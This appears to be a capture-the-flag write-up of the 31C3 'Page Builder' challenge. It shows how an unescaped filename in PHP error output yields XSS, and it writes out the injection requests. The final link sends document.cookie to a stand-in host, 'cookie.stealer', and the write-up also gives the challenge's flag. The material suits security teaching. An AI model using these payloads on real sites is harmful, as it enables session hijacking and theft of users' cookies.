31C3 CTF - Page Builder writeup

In this challenge we are provided a web page were we can upload a web-page with some pre-defined CSS style and the our content with title. Title and content was escaped and also ‘(’ and ‘*’ were removed. The only one unfiltered is the style parameter but it’s only 8 char length. So we spend most of the time on the wrong vulnerability (executing RCE throught PHP) while the good one was to get XSS throught PHP code errors. How to achive this? We need first to trigger a PHP script that will output somehow an error where our filename is displayed like:

filename=test<>.php&title=a&style=<?=<<<A%0a&content=%0aA;%0aprint 1;%0a

Going to the page test<>.php we’ll found something like:

Parse error: syntax error, unexpected '<' in /var/www/html/output/b171d75f0bb15d441d121d6978d496d21aa88b82/test<>.php on line 43

Now as you can see from the HTML source our filename isn’t escaped!

Now it’s just a matter of finding the good XSS that will fit into the filename max length:

filename=<body onload="eval(location.hash.slice(1))">.php&title=a&style=<?=<<<A%0a&content=%0aA;%0aprint 1;%0a

And we got XSS!

http://188.40.18.76/output/1ece6fe5620be2ae224b7044b70e7c86c97d9c3b/fdfsd<body onload='eval(location.hash.slice(1))'>.php#document.location="http://cookie.stealer/?c="%2bdocument.cookie;

Now just submit that link above in the contact form and grab the flag: 31c3_Y0u_H4v3_F0und_My_W34k_Err0R_P01n7

nurfed,Razor4x